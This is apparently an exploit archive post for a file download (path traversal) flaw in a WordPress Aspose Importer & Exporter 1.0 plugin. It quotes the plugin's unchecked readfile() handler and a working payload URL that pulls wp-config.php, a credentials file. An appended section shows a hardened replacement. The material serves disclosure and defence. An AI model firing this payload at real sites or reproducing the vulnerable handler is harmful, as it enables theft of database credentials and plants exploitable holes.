
WordPress Aspose Importer / Exporter 1.0 File Download

Posted on 31 March 2015

#########################################
Exploit Title : Wordpress Aspose Importer & Exporter v1.0 Plugin File Download Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage: https://wordpress.org/plugins/aspose-importer-exporter/
Download Link : https://downloads.wordpress.org/plugin/aspose-importer-exporter.2.0.zip
Date : 28 / 3 / 2015
Tested On : windows 8.1 + linux Kali
#########################################
#########################################
~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Exploit:

Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download

~ ~ ~~ ~ ~~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~~~ ~~~~> Vulnerable Code :

<?php
if(isset($_GET['file'])) {
    $file = $_GET['file'];
    $file_arr = explode('/',$file);
    $file_name = $file_arr[count($file_arr) - 1];
    header ("Content-type: octet/stream");
    header ("Content-disposition: attachment; filename=".$file_name.";");
    header("Content-Length: ".filesize($file));
    readfile($file);
    exit;
}

http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=[File Address]

Examples :

http://localhost/wordpress/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php

#########################################
#########################################
Discovered by : Rq07
#########################################
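
A hardened form of the download handler quoted above, as an added example that is not the plugin's or the vendor's code. The `exports` directory, the `EXPORT_DIR` constant and the `resolve_download()` helper are assumed names; the point is that the `file` parameter is reduced to a bare file name and the resolved path must stay inside one directory before `readfile()` is called.

```php
<?php
// Added example, not the plugin's code. EXPORT_DIR is an assumed location
// holding the only files this script is allowed to serve.
const EXPORT_DIR = __DIR__ . '/exports';

/**
 * Map a user-supplied name to a regular file strictly inside $baseDir.
 * Returns the resolved path, or null if the request must be refused.
 */
function resolve_download(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;
    }
    // Keep only the last path component, so "../../../wp-config.php"
    // is looked up as "wp-config.php" under $base and nowhere else.
    $name = basename(str_replace('\\', '/', $requested));
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // realpath() follows symlinks; the result must still sit under $base.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

if (isset($_GET['file']) && is_string($_GET['file'])) {
    $path = resolve_download(EXPORT_DIR, $_GET['file']);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    // Restrict the name to characters that cannot break the header value.
    $safeName = preg_replace('/[^A-Za-z0-9._-]/', '_', basename($path));
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $safeName . '"');
    header('Content-Length: ' . filesize($path));
    header('X-Content-Type-Options: nosniff');
    readfile($path);
    exit;
}
```

This covers path handling only; deciding which users may download an export is a separate check.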

 
